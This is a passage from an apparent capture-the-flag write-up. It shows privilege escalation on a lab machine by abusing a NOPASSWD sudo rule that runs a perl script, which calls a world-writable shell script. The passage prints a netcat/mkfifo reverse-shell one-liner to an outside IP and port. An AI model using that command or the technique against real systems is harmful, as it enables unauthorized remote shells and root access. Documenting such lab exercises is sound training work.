www-data
Checking for sudo privileges of the www-data account after gaining the initial foothold
www-data@THM-Chal:/var/www$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.plThe www-data account is able to execute /usr/bin/perl /home/itguy/backup.pl as anyone
www-data@THM-Chal:/var/www$ ls -lasht /home/itguy/backup.pl
4.0K -rw-r--r-x 1 root root 47 Nov 29 2019 /home/itguy/backup.plI can only read and execute the script
www-data@THM-Chal:/var/www$ cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");The backup.pl script calls another Bash script; /etc/copy.sh
www-data@THM-Chal:/var/www$ ls -lasht /etc/copy.sh
4.0K -rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.shInterestingly, I can write to the /etc/copy.sh script
www-data@THM-Chal:/var/www$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/fThe content of /etc/copy.sh script is a reverse shell, which I can overwrite to gain Privilege Escalation